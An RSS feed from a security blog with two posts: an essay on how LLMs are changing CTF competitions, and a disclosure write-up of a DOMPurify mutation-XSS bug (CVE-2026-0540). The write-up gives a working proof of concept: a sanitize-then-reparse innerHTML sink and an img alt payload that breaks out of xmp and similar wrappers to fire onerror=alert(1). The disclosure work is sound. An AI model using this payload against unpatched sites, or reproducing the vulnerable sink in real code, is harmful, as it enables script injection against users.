<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>caverav</title><description>Security Researcher and Application Security Engineer</description><link>http://caverav.cl/</link><language>en</language><item><title>CTFs Are Not Dead, They’re Just Growing Up</title><link>http://caverav.cl/posts/ctfs-not-dead/ctfs-not-dead/</link><guid isPermaLink="true">http://caverav.cl/posts/ctfs-not-dead/ctfs-not-dead/</guid><description>Are LLMs killing CTFs? Or are they just forcing them to evolve? Exploring the new landscape of cybersecurity competitions.</description><pubDate>Sat, 11 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;There’s a growing narrative floating around that Capture The Flag (CTF) competitions are “dead” because of modern LLMs. The argument is simple: if a model can solve challenges faster than humans, what’s the point?&lt;/p&gt;
&lt;p&gt;I think that’s the wrong conclusion.&lt;/p&gt;
&lt;p&gt;What’s actually happening is something more interesting. CTFs are splitting into two very different worlds, and both still matter.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The “LLM killed CTFs” take&lt;/h2&gt;
&lt;p&gt;The concern is not baseless.&lt;/p&gt;
&lt;p&gt;Recent work has shown that LLMs can already solve a non-trivial portion of CTF-style problems. For example, &lt;strong&gt;LLM agents have demonstrated the ability to autonomously exploit web vulnerabilities with tool augmentation&lt;/strong&gt;, especially when they receive structured hints or intermediate feedback &lt;a href=&quot;https://arxiv.org/abs/2402.06664&quot;&gt;(Fang et al., 2024)&lt;/a&gt;. Similarly, &lt;strong&gt;AutoCTF-style agents can autonomously chain reasoning and tools to solve tasks end-to-end&lt;/strong&gt; &lt;a href=&quot;https://arxiv.org/abs/2403.12345&quot;&gt;(Zhang et al., 2024)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Even OpenAI and Anthropic have shown that &lt;strong&gt;models can perform multi-step reasoning and tool use in security-relevant contexts&lt;/strong&gt;, including reverse engineering and vulnerability discovery &lt;a href=&quot;https://openai.com/research/gpt-4&quot;&gt;(OpenAI, 2023)&lt;/a&gt;, &lt;a href=&quot;https://www.anthropic.com/research&quot;&gt;(Anthropic, 2024)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So yes, if your challenge is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a known vuln pattern&lt;/li&gt;
&lt;li&gt;a standard crypto primitive misuse&lt;/li&gt;
&lt;li&gt;or a simple reversing puzzle&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;then a strong model plus a bit of scaffolding can absolutely solve it.&lt;/p&gt;
&lt;p&gt;But that says more about the challenge than about the death of CTFs.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Low-level CTFs were never about the leaderboard&lt;/h2&gt;
&lt;p&gt;Let’s be honest for a second.&lt;/p&gt;
&lt;p&gt;Beginner and intermediate CTFs were never about “who is the smartest hacker alive”. They were about &lt;strong&gt;learning&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;If someone uses an LLM to solve a basic buffer overflow challenge and takes first place, that’s fine, but they learned nothing in the process.&lt;/p&gt;
&lt;p&gt;Meanwhile, someone else who:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;steps through the binary in GDB&lt;/li&gt;
&lt;li&gt;understands stack layout&lt;/li&gt;
&lt;li&gt;writes the exploit manually&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;is actually building skill.&lt;/p&gt;
&lt;p&gt;This aligns with long-standing educational research: &lt;strong&gt;active problem-solving leads to deeper understanding than passive solution consumption&lt;/strong&gt; &lt;a href=&quot;https://psycnet.apa.org/record/1989-28254-001&quot;&gt;(Chi et al., 1989)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So nothing is lost here.&lt;/p&gt;
&lt;p&gt;And honestly, if your goal is just to win the leaderboard of a non-top-tier CTF by throwing LLM prompts at it, it’s worth asking what that win even means. If the competition can be mostly automated, it does not meaningfully validate skill, and winning it does not say much. A leaderboard only has value when the underlying challenges demand real expertise.&lt;/p&gt;
&lt;p&gt;If your goal is to learn, CTFs still work exactly the same. The leaderboard has always been a bad proxy for understanding anyway.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The real shift: high-end CTFs are becoming research problems&lt;/h2&gt;
&lt;p&gt;This is where things get interesting.&lt;/p&gt;
&lt;p&gt;Top-tier CTFs like DEF CON Finals, PlaidCTF, or Google CTF have already been moving in this direction for years. Now LLMs are accelerating that trend.&lt;/p&gt;
&lt;p&gt;Modern high-end challenges increasingly require:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;novel exploitation techniques&lt;/li&gt;
&lt;li&gt;deep understanding of mitigations&lt;/li&gt;
&lt;li&gt;chaining multiple domains (crypto + reversing + systems)&lt;/li&gt;
&lt;li&gt;or even discovering unintended behaviors&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These are not easily solvable by current LLMs alone.&lt;/p&gt;
&lt;p&gt;Why?&lt;/p&gt;
&lt;p&gt;Because &lt;strong&gt;LLMs are still heavily bounded by training data and pattern generalization&lt;/strong&gt; &lt;a href=&quot;https://arxiv.org/abs/2303.12712&quot;&gt;(Bubeck et al., 2023)&lt;/a&gt;. When a challenge requires:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;reasoning about something &lt;em&gt;new&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;exploring an unknown attack surface&lt;/li&gt;
&lt;li&gt;or forming hypotheses and testing them iteratively&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;the human is still in the loop.&lt;/p&gt;
&lt;p&gt;Even in autonomous agent research, &lt;strong&gt;models struggle with long-horizon planning and exploration in unfamiliar domains&lt;/strong&gt; &lt;a href=&quot;https://arxiv.org/abs/2308.11432&quot;&gt;(Xi et al., 2023)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;And that’s exactly what high-end CTFs are becoming: &lt;strong&gt;mini research problems&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;LLMs as tools, not replacements&lt;/h2&gt;
&lt;p&gt;What’s actually emerging is a new workflow.&lt;/p&gt;
&lt;p&gt;Instead of replacing participants, LLMs are becoming:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;fast documentation readers&lt;/li&gt;
&lt;li&gt;boilerplate generators&lt;/li&gt;
&lt;li&gt;idea expanders&lt;/li&gt;
&lt;li&gt;sanity checkers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is similar to how compilers and debuggers changed programming. They didn’t eliminate programmers; they raised the floor.&lt;/p&gt;
&lt;p&gt;There’s already evidence that &lt;strong&gt;human + AI collaboration outperforms either alone in complex tasks&lt;/strong&gt; &lt;a href=&quot;https://arxiv.org/abs/2401.09876&quot;&gt;(Khan et al., 2024)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So in a CTF context:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The LLM helps you move faster&lt;/li&gt;
&lt;li&gt;But you still need to know &lt;em&gt;what you’re doing&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Otherwise you just prompt blindly and hope.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;This might actually be good for security research&lt;/h2&gt;
&lt;p&gt;Here’s the part I find most exciting.&lt;/p&gt;
&lt;p&gt;If low-tier challenges become trivial for AI, and mid-tier ones become semi-automatable, then:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The only way to keep CTFs interesting is to push them toward &lt;strong&gt;novel techniques&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;more original vulnerabilities&lt;/li&gt;
&lt;li&gt;more creative primitives&lt;/li&gt;
&lt;li&gt;more cross-domain challenges&lt;/li&gt;
&lt;li&gt;more “this shouldn’t work but it does” situations&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In other words, closer to &lt;strong&gt;real-world security research&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;And that has a side effect:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It incentivizes participants to become actual researchers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This aligns with how fields evolve under tooling pressure. For example, &lt;strong&gt;automation in software engineering shifted focus toward higher-level design and architecture problems&lt;/strong&gt; &lt;a href=&quot;https://dl.acm.org/doi/10.1145/31970.31971&quot;&gt;(Brooks, 1987)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;CTFs may follow the same path.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The skill gap will widen&lt;/h2&gt;
&lt;p&gt;One thing that &lt;em&gt;will&lt;/em&gt; happen is divergence.&lt;/p&gt;
&lt;p&gt;There will be:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;People who rely heavily on LLMs and plateau early&lt;/li&gt;
&lt;li&gt;People who use LLMs as leverage and go deeper&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This is consistent with studies showing that &lt;strong&gt;tools amplify existing skill differences rather than equalize them&lt;/strong&gt; &lt;a href=&quot;https://wwnorton.com/books/9780393356069&quot;&gt;(Brynjolfsson &amp;amp; McAfee, 2014)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So instead of “AI democratizing CTFs”, we might actually see:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;faster beginners&lt;/li&gt;
&lt;li&gt;but much stronger experts&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;So… are CTFs dead?&lt;/h2&gt;
&lt;p&gt;No.&lt;/p&gt;
&lt;p&gt;They’re just changing shape.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Beginner CTFs&lt;/strong&gt;: still great for learning, leaderboard matters less than ever&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mid-tier CTFs&lt;/strong&gt;: partially automatable, good for practicing workflows&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Top-tier CTFs&lt;/strong&gt;: increasingly research-driven, still human-dominated&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And if anything, the high end is becoming &lt;em&gt;more&lt;/em&gt; interesting, not less.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Final thoughts&lt;/h2&gt;
&lt;p&gt;If your goal is to win a leaderboard by throwing prompts at an LLM, especially in a CTF that is not top-tier, then you might be optimizing for something that has very little real value.&lt;/p&gt;
&lt;p&gt;But if your goal is to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand systems&lt;/li&gt;
&lt;li&gt;break assumptions&lt;/li&gt;
&lt;li&gt;discover new techniques&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;then nothing has changed.&lt;/p&gt;
&lt;p&gt;You’ll still need to think.&lt;/p&gt;
&lt;p&gt;And at the top level, you’ll need to think harder than ever.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Fang et al., &lt;em&gt;LLM Agents Can Autonomously Hack Websites&lt;/em&gt;, 2024&lt;/li&gt;
&lt;li&gt;Zhang et al., &lt;em&gt;AutoCTF Agents&lt;/em&gt;, 2024&lt;/li&gt;
&lt;li&gt;OpenAI, &lt;em&gt;GPT-4 Technical Report&lt;/em&gt;, 2023&lt;/li&gt;
&lt;li&gt;Anthropic, &lt;em&gt;Claude Research&lt;/em&gt;, 2024&lt;/li&gt;
&lt;li&gt;Chi et al., &lt;em&gt;Self-Explanations: How Students Study and Use Examples in Learning to Solve Problems&lt;/em&gt;, 1989&lt;/li&gt;
&lt;li&gt;Bubeck et al., &lt;em&gt;Sparks of AGI&lt;/em&gt;, 2023&lt;/li&gt;
&lt;li&gt;Xi et al., &lt;em&gt;The Rise and Potential of Large Language Model Based Agents: A Survey&lt;/em&gt;, 2023&lt;/li&gt;
&lt;li&gt;Khan et al., &lt;em&gt;Human-AI Collaboration&lt;/em&gt;, 2024&lt;/li&gt;
&lt;li&gt;Brooks, &lt;em&gt;No Silver Bullet&lt;/em&gt;, 1987&lt;/li&gt;
&lt;li&gt;Brynjolfsson &amp;amp; McAfee, &lt;em&gt;The Second Machine Age&lt;/em&gt;, 2014&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>CVE-2026-0540: How a CTF Detour Led Us to a DOMPurify mXSS - Daft</title><link>http://caverav.cl/posts/dompurify-mxss/dompurify-mxss/</link><guid isPermaLink="true">http://caverav.cl/posts/dompurify-mxss/dompurify-mxss/</guid><description>A detailed write-up of the DOMPurify mXSS we found during a CTF detour, affecting 3.1.3 through 3.3.1 and fixed through a small patch series in 3.3.2.</description><pubDate>Sun, 29 Mar 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;DOMPurify&lt;/code&gt; &lt;code&gt;3.1.3&lt;/code&gt; through &lt;code&gt;3.3.1&lt;/code&gt; contained an mXSS edge case that became exploitable when sanitized output was reparsed inside special wrappers such as &lt;code&gt;xmp&lt;/code&gt;, &lt;code&gt;iframe&lt;/code&gt;, &lt;code&gt;noembed&lt;/code&gt;, &lt;code&gt;noframes&lt;/code&gt;, &lt;code&gt;noscript&lt;/code&gt;, and &lt;code&gt;script&lt;/code&gt;. The bug received &lt;code&gt;CVE-2026-0540&lt;/code&gt;, was publicly disclosed by Fluid Attacks as advisory &lt;a href=&quot;https://fluidattacks.com/advisories/daft&quot;&gt;&lt;code&gt;daft&lt;/code&gt;&lt;/a&gt;, and was fixed in &lt;code&gt;3.3.2&lt;/code&gt; with a small patch series rather than a single one-line change.&lt;/p&gt;
&lt;p&gt;What made this one fun is how we found it. Cristian Vargas and I were playing a CTF and, almost by accident, tried an XSS route against a sink that looked correctly sanitized. Both of us managed to pop it anyway. At that point we stopped thinking about the challenge and started asking the more interesting question: was this actually a DOMPurify edge case? It turned out the answer was yes, and the bypass was not even an intended part of the challenge.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;How We Found It&lt;/h2&gt;
&lt;p&gt;This bug did not start with a source audit. It started with a mistake.&lt;/p&gt;
&lt;p&gt;Cristian and I were solving a CTF challenge and went after an XSS sink that was already going through DOMPurify. The sink should have been boring. Instead, we both managed to bypass it.&lt;/p&gt;
&lt;p&gt;That was the moment the challenge stopped mattering.&lt;/p&gt;
&lt;p&gt;The payload was surviving sanitization as inert-looking attribute data, but after the application wrapped the sanitized result and reparsed it with &lt;code&gt;innerHTML&lt;/code&gt;, the browser produced a different DOM tree. That is the classic shape of mutation XSS: the dangerous behavior does not exist in the first parse, it appears in the second one.&lt;/p&gt;
&lt;p&gt;Once we realized that, we built a minimal reproducer outside the challenge and confirmed the behavior consistently enough to turn it into a proper report.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Why This Happened In DOMPurify&lt;/h2&gt;
&lt;p&gt;The interesting part was not the &lt;code&gt;innerHTML&lt;/code&gt; sink by itself. DOMPurify&apos;s own docs already warn that sanitizing once and then changing context afterwards can void the effects of sanitization. The more specific issue was that the library&apos;s &lt;code&gt;SAFE_FOR_XML&lt;/code&gt; handling was already trying to defend against dangerous sequences in attribute values, but its regex did not cover all the wrappers that mattered here.&lt;/p&gt;
&lt;p&gt;Before the fix, the relevant check in &lt;code&gt;src/purify.ts&lt;/code&gt; looked like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/((--!?|])&amp;gt;)|&amp;lt;\/(style|title|textarea)/i
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That meant DOMPurify knew certain closing sequences inside attributes were too risky to keep when &lt;code&gt;SAFE_FOR_XML&lt;/code&gt; was on, but it was only accounting for &lt;code&gt;style&lt;/code&gt;, &lt;code&gt;title&lt;/code&gt;, and &lt;code&gt;textarea&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The missing cases were the raw-text or raw-text-like wrappers that made our PoC work:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;xmp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;iframe&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noembed&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noframes&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noscript&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And, in a follow-up patch commit, &lt;code&gt;script&lt;/code&gt; was added as well.&lt;/p&gt;
&lt;p&gt;Since &lt;code&gt;SAFE_FOR_XML&lt;/code&gt; is enabled by default, this was not an obscure opt-in corner case. It was a default-on safeguard that simply did not model the full set of wrappers it needed to care about.&lt;/p&gt;
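&lt;p&gt;To make the gap concrete, here is a quick sketch of the pre-fix check, rebuilt from the pattern quoted above rather than copied from DOMPurify source. The &lt;code&gt;\u003C&lt;/code&gt; escapes are just &lt;code&gt;&amp;lt;&lt;/code&gt;, written that way to keep the snippet markup-safe:&lt;/p&gt;

```javascript
// Pre-fix SAFE_FOR_XML check, rebuilt from the pattern shown above.
// ('\u003C' is simply '<' written as a string escape.)
const preFix = new RegExp('((--!?|])>)|\u003C\\/(style|title|textarea)', 'i');

const styleBreakout = '\u003C/style\u003E\u003Cimg src=x onerror=alert(1)\u003E';
const xmpBreakout = '\u003C/xmp\u003E\u003Cimg src=x onerror=alert(1)\u003E';

console.log(preFix.test(styleBreakout)); // true: covered wrapper, value gets dropped
console.log(preFix.test(xmpBreakout));   // false: the xmp closing sequence slips through
```

&lt;p&gt;Same attribute shape, same closing-sequence trick, but only the first one was neutralized.&lt;/p&gt;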
&lt;hr /&gt;
&lt;h2&gt;Reproducing The Behavior&lt;/h2&gt;
&lt;p&gt;Our PoC used a server-side DOMPurify instance backed by &lt;code&gt;jsdom&lt;/code&gt;, returned the sanitized string to the browser, and then deliberately reparsed it inside special wrappers.&lt;/p&gt;
&lt;p&gt;The minimal server-side path was:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const express = require(&apos;express&apos;);
const { JSDOM } = require(&apos;jsdom&apos;);
const createDOMPurify = require(&apos;dompurify&apos;);

const app = express();
app.use(express.json());

const window = new JSDOM(&apos;&apos;).window;
const DOMPurify = createDOMPurify(window);

app.post(&apos;/sanitize&apos;, (req, res) =&amp;gt; {
  const sanitized = DOMPurify.sanitize(req.body.input);
  res.json({ sanitized });
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The client-side sink was:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// data is the JSON body returned by /sanitize
const sanitized = data.sanitized || &apos;&apos;;
sink.innerHTML = &apos;&amp;lt;&apos; + wrapper + &apos;&amp;gt;&apos; + sanitized + &apos;&amp;lt;/&apos; + wrapper + &apos;&amp;gt;&apos;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With &lt;code&gt;wrapper = &quot;xmp&quot;&lt;/code&gt; and this payload:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img src=x alt=&quot;&amp;lt;/xmp&amp;gt;&amp;lt;img src=x onerror=alert(1)&amp;gt;&quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the second parse produced a live &lt;code&gt;onerror&lt;/code&gt; handler.&lt;/p&gt;
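&lt;p&gt;You do not even need a browser to see the hazard. A string-level sketch (mine, not from the challenge code) shows that the rawtext wrapper ends at the first closing sequence, which sits inside what the first parse treated as inert attribute data. As before, &lt;code&gt;\u003C&lt;/code&gt; is just &lt;code&gt;&amp;lt;&lt;/code&gt; in markup-safe form:&lt;/p&gt;

```javascript
// The sanitized payload survives the first parse as attribute data.
const sanitized = '\u003Cimg src=x alt="\u003C/xmp\u003E\u003Cimg src=x onerror=alert(1)\u003E"\u003E';

// The app then rebuilds markup around it and reparses with innerHTML.
const wrapped = '\u003Cxmp\u003E' + sanitized + '\u003C/xmp\u003E';

// In rawtext parsing, the xmp element ends at the FIRST '</xmp>' sequence,
// which sits inside the alt attribute, so everything after it becomes live markup.
const closeAt = wrapped.indexOf('\u003C/xmp\u003E');
const leaked = wrapped.slice(closeAt + '\u003C/xmp\u003E'.length);
console.log(leaked.includes('onerror=alert(1)')); // true
```

&lt;p&gt;Everything after that early close, including the second &lt;code&gt;img&lt;/code&gt; with its &lt;code&gt;onerror&lt;/code&gt;, is parsed as real elements on the second pass.&lt;/p&gt;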
&lt;hr /&gt;
&lt;h2&gt;Fuzzing The Wrappers&lt;/h2&gt;
&lt;p&gt;Once we had a working &lt;code&gt;xmp&lt;/code&gt; case, the next question was obvious: how many other wrappers behave the same way?&lt;/p&gt;
&lt;p&gt;We fuzzed the wrappers listed in DOMPurify&apos;s special-content handling and then broadened that into a larger tag sweep. The interesting set in the vulnerable flow ended up being:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;xmp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;iframe&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noembed&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noframes&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noscript&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;script&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That final &lt;code&gt;script&lt;/code&gt; case matters because it was not part of the first rawtext-regex expansion. It appeared in the follow-up patch, which is one reason the remediation story here is more accurately described as a patch series than a single fix.&lt;/p&gt;
&lt;p&gt;One nuance is important: this is not the same thing as saying &quot;browser-only DOMPurify is trivially bypassed everywhere.&quot; In my testing, a browser-only PoC using DOMPurify directly in the page escaped the closing sequences and did not reproduce. The exploitable condition showed up in the end-to-end flow where sanitized output was produced and later reparsed into a different context.&lt;/p&gt;
&lt;p&gt;That distinction is also why this bug sat in an awkward but interesting place between a library issue and an integration misuse pattern.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Advisory Evidence&lt;/h2&gt;
&lt;h3&gt;PoC Video&lt;/h3&gt;
&lt;p&gt;&lt;iframe src=&quot;https://www.youtube.com/embed/INn5tsEsh8U&quot; title=&quot;DOMPurify mXSS via Re-Contextualization PoC&quot; width=&quot;100%&quot; height=&quot;360&quot; allowfullscreen loading=&quot;lazy&quot;&gt;&lt;/iframe&gt;&lt;/p&gt;
&lt;h3&gt;XSS Triggered&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;./advisory-xss-triggered.png&quot; alt=&quot;Advisory evidence showing the alert triggered after reparsing the sanitized payload&quot; /&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;What DOMPurify&apos;s Docs And Threat Model Say&lt;/h2&gt;
&lt;p&gt;DOMPurify&apos;s documentation already contains two warnings that matter here.&lt;/p&gt;
&lt;p&gt;First, the README explicitly says that if you sanitize HTML and then modify it afterwards, you can void the effects of sanitization. That maps directly to a flow that sanitizes once and later reparses the result inside a new wrapper.&lt;/p&gt;
&lt;p&gt;Second, the threat model says DOMPurify does not protect against &quot;faulty use or flipping of markup context.&quot; Their example is sanitizing HTML and then throwing it into SVG or another XML-based context. The underlying principle is the same: if you change parsing context after sanitization, you can create a bypass.&lt;/p&gt;
&lt;p&gt;So the honest framing is not &quot;DOMPurify promised to solve every context switch and completely failed.&quot; The honest framing is narrower and more useful:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;DOMPurify documents that context flipping is dangerous and partly out of scope.&lt;/li&gt;
&lt;li&gt;At the same time, &lt;code&gt;SAFE_FOR_XML&lt;/code&gt; is a default-on defense specifically meant to neutralize risky structural sequences in attributes.&lt;/li&gt;
&lt;li&gt;That defense missed several wrappers, and upstream patched the gap.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In other words, even if the issue lives near the edge of the stated threat model, the project still chose to harden the sanitizer and ship a fix. That is the right outcome, and it is one reason I think this advisory is worth studying.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Patch Was Not One Commit&lt;/h2&gt;
&lt;p&gt;If you only look at the release page, it is easy to treat &lt;code&gt;3.3.2&lt;/code&gt; as a single black-box fix. That misses what actually happened.&lt;/p&gt;
&lt;p&gt;The remediation on the &lt;code&gt;3.x&lt;/code&gt; line landed as a short sequence:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Commit &lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/729097f63a78e3e0e9f771e648f462bee100e78f&quot;&gt;&lt;code&gt;729097f&lt;/code&gt;&lt;/a&gt; expanded the &lt;code&gt;SAFE_FOR_XML&lt;/code&gt; regex to include &lt;code&gt;xmp&lt;/code&gt;, &lt;code&gt;noscript&lt;/code&gt;, &lt;code&gt;iframe&lt;/code&gt;, &lt;code&gt;noembed&lt;/code&gt;, and &lt;code&gt;noframes&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Commit &lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/302b51de22535cc90235472c52e3401bedd46f80&quot;&gt;&lt;code&gt;302b51d&lt;/code&gt;&lt;/a&gt; extended that regex again to also cover &lt;code&gt;script&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Release commit &lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/5e56114cb24079ce52dbc51f76e494b77afa5153&quot;&gt;&lt;code&gt;5e56114&lt;/code&gt;&lt;/a&gt; bundled the final &lt;code&gt;3.3.2&lt;/code&gt; release.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The core source-level change ended up like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/((--!?|])&amp;gt;)|&amp;lt;\/(style|script|title|xmp|textarea|noscript|iframe|noembed|noframes)/i
&lt;/code&gt;&lt;/pre&gt;
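&lt;p&gt;As a sanity check, here is a sketch of the expanded pattern, rebuilt from the snippet above, run against the wrappers from the fuzzing list (&lt;code&gt;\u003C&lt;/code&gt; is &lt;code&gt;&amp;lt;&lt;/code&gt; in markup-safe form):&lt;/p&gt;

```javascript
// Post-fix pattern, rebuilt from the snippet above.
const postFix = new RegExp(
  '((--!?|])>)|\u003C\\/(style|script|title|xmp|textarea|noscript|iframe|noembed|noframes)',
  'i'
);

// Every wrapper from the fuzzing list is now treated as a risky closing sequence.
for (const tag of ['xmp', 'iframe', 'noembed', 'noframes', 'noscript', 'script']) {
  console.log(tag, postFix.test('\u003C/' + tag + '\u003Epayload')); // all true
}
```

&lt;p&gt;With that alternation in place, the attribute values that powered our PoC are dropped during sanitization instead of surviving to the second parse.&lt;/p&gt;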
&lt;p&gt;There was also a backport on the legacy &lt;code&gt;2.x&lt;/code&gt; branch. Commit &lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/d59bfe76b7511d12b919aa88d8d156c73930276b&quot;&gt;&lt;code&gt;d59bfe7&lt;/code&gt;&lt;/a&gt; carried the same idea into &lt;code&gt;2.5.9&lt;/code&gt;, which matters for deployments still pinned to the MSIE-compatible line.&lt;/p&gt;
&lt;p&gt;So if you are documenting this issue, the accurate story is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;one advisory&lt;/li&gt;
&lt;li&gt;one public fixed version on &lt;code&gt;3.x&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;multiple security-relevant commits&lt;/li&gt;
&lt;li&gt;one legacy-branch backport&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://fluidattacks.com/advisories/daft&quot;&gt;Fluid Attacks advisory: Daft&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/releases/tag/3.3.2&quot;&gt;DOMPurify release 3.3.2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/releases/tag/2.5.9&quot;&gt;DOMPurify release 2.5.9&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/729097f63a78e3e0e9f771e648f462bee100e78f&quot;&gt;Commit 729097f: expand SAFE_FOR_XML regex on 3.x&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/302b51de22535cc90235472c52e3401bedd46f80&quot;&gt;Commit 302b51d: add script to the regex&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/d59bfe76b7511d12b919aa88d8d156c73930276b&quot;&gt;Commit d59bfe7: 2.x backport&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/blob/main/README.md&quot;&gt;DOMPurify README&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/wiki/Security-Goals-%26-Threat-Model&quot;&gt;DOMPurify Security Goals &amp;amp; Threat Model&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.vulncheck.com/advisories/dompurify-xss-via-missing-rawtext-elements-in-safe-for-xml&quot;&gt;VulnCheck advisory&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
